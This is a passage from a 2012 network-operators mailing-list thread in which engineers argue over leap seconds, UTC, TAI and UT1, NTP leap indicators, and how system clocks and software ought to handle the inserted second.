oscillators. Luckily, Earth has > negligible frame dragging, for the kind of accuracy we > currently need. I think everyone on this list is going in the wrong direction with this issue. What you're all arguing over is the "correct time" for some defintion of "correct". I'm a bit more practical. How about we write software so a leap second doesn't crash everything? We can then allow the time nuts get back to arguing which leap seconds we should use, or time reference, or whatever. I'd even take off by a second but didn't crash, over crashed. -- Leo Bicknell - bicknell at ufp.org - CCIE 3440 PGP keys at http://www.ufp.org/~bicknell/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 826 bytes Desc: not available URL: From valdis.kletnieks at vt.edu Tue Jul 3 15:54:24 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 16:54:24 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 21:49:40." References: Message-ID: <49423.1341348864@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said: > Leapseconds can be both positive and negative, but up to now, the > earth has only slowed down, so we have added seconds. That's what many people believe, but it's not exactly right. Leap seconds are added for the exact same reason leap days are - the earth's rotation isn't a clean multiple of the year. We know we need to stick in an entire leap day every 4 years or so, then add the 400 hack to get it closer. At that point, it's *really* close, to the point where just shimming in a second every once in a while is enough to get it back in sync. The earth's slowdown (or speedup) is measured by *how often* we need to add leap seconds. If we needed to add one every 3 years, but the frequency rises to once every 2.5 years, *that* indicates slowing. In other words, the slowdown or speedup is the first derivative of the rate that UT and TAI diverge - if the earth rotated at constant speed, the derivative would be zero, and we'd insert leap seconds on a nice predictable schedule. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From roll at Stupi.SE Tue Jul 3 23:06:20 2012 From: roll at Stupi.SE (Peter Lothberg) Date: Tue, 3 Jul 2012 23:06:20 CEST Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu> Message-ID: UTC and time is defined as part of the SI system and ITU etc, so we just need to implement the time system correct. If you try to invent your own way, there are surprises we don;t need to re-explore.. > On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said: > > > Leapseconds can be both positive and negative, but up to now, the > > earth has only slowed down, so we have added seconds. > > That's what many people believe, but it's not exactly right. Leap seconds > are added for the exact same reason leap days are - the earth's rotation > isn't a clean multiple of the year. We know we need to stick in an entire > leap day every 4 years or so, then add the 400 hack to get it closer. At > that point, it's *really* close, to the point where just shimming in a second > every once in a while is enough to get it back in sync. > > The earth's slowdown (or speedup) is measured by *how often* we > need to add leap seconds. If we needed to add one every 3 years, but > the frequency rises to once every 2.5 years, *that* indicates slowing. > In other words, the slowdown or speedup is the first derivative of > the rate that UT and TAI diverge - if the earth rotated at constant > speed, the derivative would be zero, and we'd insert leap seconds on > a nice predictable schedule. I'm not an astronomer, but some of the errors we have in the second intenmtion ended up in the earth position measurements, so the table is not nicely spaced.. On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no "-" # @(#)leapseconds 7.17 # Allowance for leapseconds added to each timezone file. # The International Earth Rotation Service periodically uses leap seconds # to keep UTC to within 0.9 s of UT1 # (which measures the true angular orientation of the earth in space); see # Terry J Quinn, The BIPM and the accurate measure of time, # Proc IEEE 79, 7 (July 1991), 894-905. # There were no leap seconds before 1972, because the official mechanism # accounting for the discrepancy between atomic time and the earth's rotation # did not exist until the early 1970s. # The correction (+ or -) is made at the given time, so lines # will typically look like: # Leap YEAR MON DAY 23:59:60 + R/S # or # Leap YEAR MON DAY 23:59:59 - R/S # If the leapsecond is Rolling (R) the given time is local time # If the leapsecond is Stationary (S) the given time is UTC # Leap YEAR MONTH DAY HH:MM:SS CORR R/S Leap 1972 Jun 30 23:59:60 + S Leap 1972 Dec 31 23:59:60 + S Leap 1973 Dec 31 23:59:60 + S Leap 1974 Dec 31 23:59:60 + S Leap 1975 Dec 31 23:59:60 + S Leap 1976 Dec 31 23:59:60 + S Leap 1977 Dec 31 23:59:60 + S Leap 1978 Dec 31 23:59:60 + S Leap 1979 Dec 31 23:59:60 + S Leap 1981 Jun 30 23:59:60 + S Leap 1982 Jun 30 23:59:60 + S Leap 1983 Jun 30 23:59:60 + S Leap 1985 Jun 30 23:59:60 + S Leap 1987 Dec 31 23:59:60 + S Leap 1989 Dec 31 23:59:60 + S Leap 1990 Dec 31 23:59:60 + S Leap 1992 Jun 30 23:59:60 + S Leap 1993 Jun 30 23:59:60 + S Leap 1994 Jun 30 23:59:60 + S Leap 1995 Dec 31 23:59:60 + S Leap 1997 Jun 30 23:59:60 + S Leap 1998 Dec 31 23:59:60 + S Leap 2005 Dec 31 23:59:60 + S Leap 2008 Dec 31 23:59:60 + S Leap 2012 Jun 30 23:59:60 + S # INTERNATIONAL EARTH ROTATION AND REFERENCE SYSTEMS SERVICE (IERS) # # SERVICE INTERNATIONAL DE LA ROTATION TERRESTRE ET DES SYSTEMES DE REFERENCE # # SERVICE DE LA ROTATION TERRESTRE # OBSERVATOIRE DE PARIS # 61, Av. de l'Observatoire 75014 PARIS (France) # Tel. : 33 (0) 1 40 51 22 26 # FAX : 33 (0) 1 40 51 22 91 # Internet : services.iers at obspm.fr From jra at baylink.com Tue Jul 3 16:08:09 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 17:08:09 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703205256.GA25086@ussenterprise.ufp.org> Message-ID: <4559615.12396.1341349689104.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Leo Bicknell" > I'd even take off by a second but didn't crash, over crashed. You would, but lots of people would not, and that's not the contract made by the API definition. If you want to run a Google-patched NTP server and talk to it, you're welcome to. The rest of us would prefer to just get it right, so we don't have to get lied to. Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From dot at dotat.at Tue Jul 3 16:24:39 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 22:24:39 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> Message-ID: Owen DeLong wrote: > > Since we have a tradition of measuring diurnal and other repetitive > cycles (days) based on the rotation of the earth, we end up with fudge > factors to make that line up with months from time to time. (leap > seconds). That is not what leap seconds are. Leap seconds are to align the artificial and very stable atomic timescale with the irregular and slowing rotation of the earth. Tony. -- f.anthony.n.finch http://dotat.at/ Faeroes, South-east Iceland: Easterly 5 or 6, backing northeasterly 4 or 5. Moderate. Occasional rain, fog patches in Faeroes. Moderate or good, occasionally very poor in Faeroes. From dot at dotat.at Tue Jul 3 16:28:04 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 22:28:04 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: Peter Lothberg wrote: > > We have a NTP server on Earth (say Washington-DC) and Vint has > extended the Internet to planet Mars, can we use NTP? No. http://fanf.livejournal.com/116480.html Tony. -- f.anthony.n.finch http://dotat.at/ Rockall: Cyclonic, becoming northerly later, 4 or 5, occasionally 6 in far north. Moderate or rough. Rain or showers. Moderate or good, occasionally poor. From dot at dotat.at Tue Jul 3 16:35:13 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 22:35:13 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: Peter Lothberg wrote: > > As the definition of a atomic second is 9192631770 complete > oscillations of cesium 133 between enery level 3 and 4, "everyone" can > make a second in their lab, that's TAI. No, TAI isn't based on the SI second you realise in your lab. It's the SI second realised on the geoid by a large fleet of clocks. If you are on Mars then TAI isn't based on your SI second, because TAI doesn't tick at a fixed rate relative to local proper time owing to the orbital differences of the two planets. > UT1-UTC is done by observations from radio astronomers VLBI telecopes > and a comitee, you can't make one in your lab, and it's not real > time. You can make quite a good approximation to UT1 with a transit instrument and knowledge of your position. Tony. -- f.anthony.n.finch http://dotat.at/ Forties, Cromarty, Forth, Tyne, Dogger: Southeasterly 4 or 5. Slight or moderate. Rain or drizzle, fog banks. Moderate or poor, occasionally very poor. From dot at dotat.at Tue Jul 3 16:40:09 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 22:40:09 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu> References: <49423.1341348864@turing-police.cc.vt.edu> Message-ID: valdis.kletnieks at vt.edu wrote: > > Leap seconds are added for the exact same reason leap days are - the > earth's rotation isn't a clean multiple of the year. No leap seconds have nothing to do with years. Tony. -- f.anthony.n.finch http://dotat.at/ Rockall: Cyclonic, becoming northerly later, 4 or 5, occasionally 6 in far north. Moderate or rough. Rain or showers. Moderate or good, occasionally poor. From dot at dotat.at Tue Jul 3 16:50:38 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 22:50:38 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: Peter Lothberg wrote: > And I forgot: They made a "mistake" and missed their intentions of a > solar day year 1900 when defining the atomic second. Off by 2s in 100 > years. No that is not correct, or at least it's nowhere near as simple as that. The atomic second was matched to the second of ephemeris time, and that was based on Newcomb's tables of the sun, which in effect used the average length of the second from the 1800s. http://ucolick.org/~sla/leapsecs/dutc.html Tony. -- f.anthony.n.finch http://dotat.at/ Viking, North Utsire, South Utsire: Southeasterly 4 or 5, increasing 6 at times. Moderate. Occasional rain, fog patches. Moderate, occasionally very poor. From smb at cs.columbia.edu Tue Jul 3 16:54:59 2012 From: smb at cs.columbia.edu (Steven Bellovin) Date: Tue, 3 Jul 2012 17:54:59 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: On Jul 3, 2012, at 5:06 PM, Peter Lothberg wrote: > > > On one of my BSD boxes. /usr/src/share/zoneinfo/leapseconds, I see no > "-" No, but they're allowed; see Figure 9 of RFC 5905: LI Leap Indicator (leap): 2-bit integer warning of an impending leap second to be inserted or deleted in the last minute of the current month with values defined in Figure 9. +-------+----------------------------------------+ | Value | Meaning | +-------+----------------------------------------+ | 0 | no warning | | 1 | last minute of the day has 61 seconds | | 2 | last minute of the day has 59 seconds | | 3 | unknown (clock unsynchronized) | +-------+----------------------------------------+ Figure 9: Leap Indicator --Steve Bellovin, https://www.cs.columbia.edu/~smb From kmedcalf at dessus.com Tue Jul 3 17:20:14 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Tue, 03 Jul 2012 16:20:14 -0600 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> > Leap seconds are to align the artificial and very stable atomic timescale > with the irregular and slowing rotation of the earth. You are assuming facts not in evidence. The rotation is merely irregular within the capabilities of our scheme of measurement, calculation, and observation. Once upon a time eclipses of the sun and moon were "random magic", before the mechanism was understood. So to the periodic cycles of the rotation of the earth about its axis, the planet about the sun, etc., are viewed as "magical". This is not due to magic, but rather limitations of understanding. Leap seconds are to align the artifical timescale (which we presently assume, based on facts not in evidence) to be very stable with the simple observation of the equinox and zenith of the sun, on which "time" reconning is based. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From dot at dotat.at Tue Jul 3 17:33:22 2012 From: dot at dotat.at (Tony Finch) Date: Tue, 3 Jul 2012 23:33:22 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: Keith Medcalf wrote: > > You are assuming facts not in evidence. The rotation is merely > irregular within the capabilities of our scheme of measurement, > calculation, and observation. There is LOTS of evidence that the earth's rotation is irregular. VLBI, laser ranging of the moon, etc. This was known long before the atomic clock was invented, and it is why the definition of the second was changed from one based on earth rotation to one based on Newcomb's ephemerides, before the change to an atomic second. Tony. -- f.anthony.n.finch http://dotat.at/ Hebrides, Bailey: East backing northeast 5 or 6, decreasing 4 later in Hebrides. Rough in Bailey at first, otherwise moderate. Rain at times, fog patches. Moderate, occasionally very poor. From msa at latt.net Tue Jul 3 17:45:27 2012 From: msa at latt.net (Majdi S. Abbas) Date: Tue, 3 Jul 2012 18:45:27 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <85c752350c2e434f9c86242d474c4614@mail.dessus.com> Message-ID: <20120703224527.GD29131@puck.nether.net> On Tue, Jul 03, 2012 at 11:33:22PM +0100, Tony Finch wrote: > Keith Medcalf wrote: > > > > You are assuming facts not in evidence. The rotation is merely > > irregular within the capabilities of our scheme of measurement, > > calculation, and observation. > > There is LOTS of evidence that the earth's rotation is irregular. VLBI, > laser ranging of the moon, etc. This was known long before the atomic > clock was invented, and it is why the definition of the second was changed > from one based on earth rotation to one based on Newcomb's ephemerides, > before the change to an atomic second. This. Shoot, seismic activity has a measurable effect. The best we can do is approximate it and align the timescales as needed. There's no lack of understanding here, just a changing planet. Now, changing your kernel's leap second handler and not testing it, well, you can't blame that one on the ITU or the aforementioned planet. --msa From kmedcalf at dessus.com Tue Jul 3 17:56:13 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Tue, 03 Jul 2012 16:56:13 -0600 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Message-ID: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com> Tony Finch wrote: > Keith Medcalf wrote: > > You are assuming facts not in evidence. The rotation is merely > > irregular within the capabilities of our scheme of measurement, > > calculation, and observation. > There is LOTS of evidence that the earth's rotation is irregular. VLBI, > laser ranging of the moon, etc. This was known long before the atomic > clock was invented, and it is why the definition of the second was changed > from one based on earth rotation to one based on Newcomb's ephemerides, > before the change to an atomic second. What you mean is that it is subject to periodicities and forces which you do not understand, and that within your limited perception, this ignorance is taken as "irregularity". Just because the system encompasses rules and properties beyond your understanding and observation does not mean that it is magic. It is impossible for the earth's rotation to be irregular, just as it is impossible for the orbit around the sun to be irreglar, or the orbit of the solar system within the galaxy, or the galaxy within the universe, or the universe within the multiverse, to be irregular. The irregularity is due to inability to comprehend the rather simple set of rules governing the motion, or failures of observation. Once upon a time (not too long ago) the orbit of Pluto was thought to be "irregular". It was not. There was another body right where it would be expected to be found affecting the orbit of Pluto. All that was required to "discover" it was someone who applied logical thought processes rather than magical thought processes to the observed data. The earth's rotation and orbit is perfectly regular. Your error is one of assumption and a failure to admit that your knowledge is imperfect. ** "your" is the general y'all, not you in particular ** --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From avg at kotovnik.com Tue Jul 3 18:02:29 2012 From: avg at kotovnik.com (Vadim Antonov) Date: Tue, 03 Jul 2012 16:02:29 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: Message-ID: <4FF37A05.7040305@kotovnik.com> On 7/3/2012 2:35 PM, Tony Finch wrote: > Peter Lothberg wrote: >> >> As the definition of a atomic second is 9192631770 complete >> oscillations of cesium 133 between enery level 3 and 4, "everyone" can >> make a second in their lab, that's TAI. > > No, TAI isn't based on the SI second you realise in your lab. It's the SI > second realised on the geoid by a large fleet of clocks. I think if anyone here is well aware of that that's be Peter:) The reason for the fleet of clocks is partly political, partly practical (cesium clocks are not the most precise... so averaging between a bunch of them is used to calibrate better master clocks). But in theory, if you can get the technical wrinkles worked out, you can derive the same frequency standard in your lab with a single instrument. (One more issue is that non-relativistic time is not only the frequency of oscillators, but also a reference point). --vadim From dot at dotat.at Tue Jul 3 18:08:25 2012 From: dot at dotat.at (Tony Finch) Date: Wed, 4 Jul 2012 00:08:25 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com> References: <2a30ca40148ece4587271b42b8cfe7e9@mail.dessus.com> Message-ID: Keith Medcalf wrote: > > What you mean is that it is subject to periodicities and forces which > you do not understand, and that within your limited perception, this > ignorance is taken as "irregularity". Just because the system > encompasses rules and properties beyond your understanding and > observation does not mean that it is magic. You seem to have a strange interpretation of the word "irregular". All I mean is that it does not rotate at a regular rate, i.e. smoothly. It is not a regular oscillator. Tony. -- f.anthony.n.finch http://dotat.at/ Cromarty, Forth, Tyne, Dogger: Southeast 4 or 5, decreasing 3 at times. Slight or moderate. Rain or drizzle, fog patches. Moderate, occasionally very poor. From dot at dotat.at Tue Jul 3 18:15:09 2012 From: dot at dotat.at (Tony Finch) Date: Wed, 4 Jul 2012 00:15:09 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF37A05.7040305@kotovnik.com> References: <4FF37A05.7040305@kotovnik.com> Message-ID: Vadim Antonov wrote: > > But in theory, if you can get the technical wrinkles worked out, you can > derive the same frequency standard in your lab with a single instrument. > > (One more issue is that non-relativistic time is not only the frequency of > oscillators, but also a reference point). Your parenthetical point explains why TAI does not tick at the same rate as the SI second in your lab, expecially if your lab is (for example) in Colorado. You have to adjust the frequency depending on your difference in gravitational potential from the geoid. Tony. -- f.anthony.n.finch http://dotat.at/ Biscay: West or southwest 4 or 5, decreasing 3 at times. Moderate. Rain then showers. Moderate or good, occasionally poor at first. From owen at delong.com Tue Jul 3 18:48:14 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 16:48:14 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> Message-ID: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> On Jul 3, 2012, at 1:08 PM, Keith Medcalf wrote: > >>> The system clock needs to be UTC, not UTC ? some offset stuck >>> somewhere that keeps some form of running tally of the current leap >>> second offset since the epoch. > >> Nope. UTC *includes* leap seconds already. It's UT1 that does not. > >> Are you suggesting that NTP timekeeping should be based on UT1? > > The system clock should be based on UT1 and should be monotonically increasing since this matches the common concept of time. Calculations done with this value are all based on it being UT1 and using the "common" notion of UT1 rules. The root cause of the difficulties is that someone decided that the system clock would not maintain "wall clock" time (UT1) but rather some other timebase and then "step" that time to keep it in sync with UT1. > It only matches the common concept of time at some particular instant. Over the course of several years it will become less and less aligned with the common concept of time. Most people operate on the assumption that there are 86400*365.25 seconds per year overall and that every day is 86,400 seconds. UTC matches that common conception of time. UT1 does not because UT1 monotonically increments one second for every elapsed second of time and continues to drift out of synchronization with the celestial phenomena on which the common conception of time is based. > NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1. This will break many many currently correct applications and is not a change that should be undertaken lightly. Especially not if it is intended to fix a moderately esoteric bug in a few things that crops up once per decade or so. Owen From owen at delong.com Tue Jul 3 18:53:32 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 16:53:32 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703200953.GA16042@pob.ytti.fi> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> Message-ID: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> On Jul 3, 2012, at 1:09 PM, Saku Ytti wrote: > On (2012-07-03 12:46 -0700), Owen DeLong wrote: > >> If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write. > > If only all software could be ordered from you Owen, but in practice this > is not possible. Some code will be written less intelligent people. And > reviewing any code doing foo = timestamp+offset and if now > foo, virtually > never expects time to move backwards. Sure, but even with that, 99% of it has only a passing 'interesting' effect and then recovers. > UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move > backwards. Unixtime moves backwards, like spanish inquisition no one > expects that. UTC (and the system clock) should not move backwards, but, rather they repeat second 59. UTC goes 58->59->00 most of the time, but during a leap second, it should go 58->59->59->00). It's not so much going backwards as dropping a chime. >> It is well known that leap seconds exist. > > Quite. But it is not well known that unixtime travels backwards. > In part because it shouldn't actually do so. It should simply chime 59 twice. Owen From sla at ucolick.org Tue Jul 3 18:59:54 2012 From: sla at ucolick.org (Steve Allen) Date: Tue, 3 Jul 2012 16:59:54 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> Message-ID: <20120703235954.GA28857@ucolick.org> Tony Finch dot at dotat.at wrote > No that is not correct, or at least it's nowhere near as simple as that. > The atomic second was matched to the second of ephemeris time, and that > was based on Newcomb's tables of the sun, which in effect used the average > length of the second from the 1800s. > http://ucolick.org/~sla/leapsecs/dutc.html Last fall we held a meeting to consider how UTC might be changed and what the implications of leaps seconds were. The proceedings fill 400 pages of a book. For the sound bite version (only 3 pictures) of leap seconds http://www.ucolick.org/~sla/leapsecs/amsci.html For a view of the international legal mess caused by leap seconds http://www.ucolick.org/~sla/leapsecs/epochtime.html For a blow-by-blow review of the international bureaucratic regulatory situation for leap seconds see http://www.ucolick.org/~sla/leapsecs/onlinebib.html For a worked example that could alleviate the disagreement between POSIX and leap seconds, and which might break the international stalemate http://www.ucolick.org/~sla/leapsecs/right+gps.html In there are also links to those 400 pages of the book, but I suggest that this forum is not the best place to rehash this information. -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory--ISB Natural Sciences II, Room 165 Lat +36.99855 1156 High Street Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From cmadams at hiwaay.net Tue Jul 3 19:26:48 2012 From: cmadams at hiwaay.net (Chris Adams) Date: Tue, 3 Jul 2012 19:26:48 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> Message-ID: <20120704002648.GA3263@hiwaay.net> Once upon a time, Owen DeLong said: > UTC (and the system clock) should not move backwards, but, rather they repeat > second 59. UTC goes 58->59->00 most of the time, but during a leap second, it > should go 58->59->59->00). It's not so much going backwards as dropping a chime. That would be true if the highest resolution clock was one second, but that's not the case. Anything that uses gettimeofday() sees time repeat (which means it counts up to 59.999999 seconds and then goes back to 59.000000). -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From randy at psg.com Tue Jul 3 19:32:17 2012 From: randy at psg.com (Randy Bush) Date: Wed, 04 Jul 2012 09:32:17 +0900 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> Message-ID: > Also, I don't think there is an acceptable level of downtime for > water. coming soon to a planet near you randy From owen at delong.com Tue Jul 3 19:34:37 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 17:34:37 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu> References: <49423.1341348864@turing-police.cc.vt.edu> Message-ID: <63E2BC70-FED8-4736-89D4-ECD1691CAEFA@delong.com> On Jul 3, 2012, at 1:54 PM, Valdis.Kletnieks at vt.edu wrote: > On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said: > >> Leapseconds can be both positive and negative, but up to now, the >> earth has only slowed down, so we have added seconds. > > That's what many people believe, but it's not exactly right. Leap seconds > are added for the exact same reason leap days are - the earth's rotation > isn't a clean multiple of the year. We know we need to stick in an entire > leap day every 4 years or so, then add the 400 hack to get it closer. At > that point, it's *really* close, to the point where just shimming in a second > every once in a while is enough to get it back in sync. > IIRC, isn't it: Add a leap day every 4 years. Exception: If the year ends in 00, do not add a leap day. (an exception seemingly glossed over in the thread so far) Exception to the exception: If the year is a multiple of 400, add a leap day. (so called 400 hack) With that set of rules, we get close enough to only fudge by a second here and there. Owen From randy.fischer at gmail.com Tue Jul 3 20:06:21 2012 From: randy.fischer at gmail.com (Randy Fischer) Date: Tue, 3 Jul 2012 21:06:21 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> Message-ID: On Tue, Jul 3, 2012 at 5:24 PM, Tony Finch wrote: > Leap seconds are to align the artificial and very stable atomic timescale > with the irregular and slowing rotation of the earth. > What do you want to use for a clock? It is convenient (if provincial) for me to use the sky as the ultimate clock. Thus these adjustments. From avg at kotovnik.com Tue Jul 3 20:13:15 2012 From: avg at kotovnik.com (Vadim Antonov) Date: Tue, 03 Jul 2012 18:13:15 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FF37A05.7040305@kotovnik.com> Message-ID: <4FF398AB.2070601@kotovnik.com> On 7/3/2012 4:15 PM, Tony Finch wrote: > Vadim Antonov wrote: >> >> But in theory, if you can get the technical wrinkles worked out, you can >> derive the same frequency standard in your lab with a single instrument. >> >> (One more issue is that non-relativistic time is not only the frequency of >> oscillators, but also a reference point). > > Your parenthetical point explains why TAI does not tick at the same rate > as the SI second in your lab, expecially if your lab is (for example) in > Colorado. You have to adjust the frequency depending on your difference in > gravitational potential from the geoid. > > Tony. > I'm afraid I didn't express my thoughts clearly... I means besides agreement of what a second is there is also an agreement on when the zeroeth second was, a fixed reference point in time. *That* cannot be recreated in a lab. (You can correct for relativistic effects of local gravity and moving frame of reference, though, to match conditions on the Earth and thus the SI definition of second). However, the whole concept of universal standard of _time_ (as opposed to standard of second) is thoroughly non-relativistic because it claims to have clocks at different locations ticking simultaneously. The special relativity, of course, makes it clear than simultaniety is in the eye of the observer:) In the end, you can only do limited Einstein-Poincare synchronization within a chosen reference frame. An interesting factoid: the notion of synchronized time differs if you synchronize clocks from East-to-West and from West-to-East, due to Sagnac effect:) --vadim PS. I would vote for using TAI instead of UTC as the non-relativistic time base in computer systems. The idea of expressing UTC as a single number (instead of tuple) is silly because it creates aliases or gaps. You cannot do simple interval arithmetic over UTC, no more than you can do that over local daylight savings time; and doing accurate time computation for events in the future is impossible in both because they depend on unpredictable factors (Earth rotation rate, politics, etc). TAI is also not a fixed given, because the standards are being refined, but at least the refinements tend to be predictably in the direction of improved accuracy, so they don't break things. From sla at ucolick.org Tue Jul 3 20:28:13 2012 From: sla at ucolick.org (Steve Allen) Date: Tue, 3 Jul 2012 18:28:13 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF398AB.2070601@kotovnik.com> References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> Message-ID: <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> On 2012 Jul 3, at 18:13, Vadim Antonov wrote: > PS. I would vote for using TAI instead of UTC as the > non-relativistic time base in computer systems. A problem with the use of TAI is that the BIPM and CCTF (who make TAI) expressed strongly that they do not want it used as a system time in document CCTF09-27 http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf so strongly that they end by contemplating the discontinuation of TAI. Unless there is international agreement that a time scale should be used, and support of the agency making that time scale, there will be trouble. The only way out of those constraints is to have the wherewithal of the US DoD or the Chinese government who simply asserted that the GPS system time and Beidou system time would be something other than those international standards. -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory Natural Sciences II, Room 165 Lat 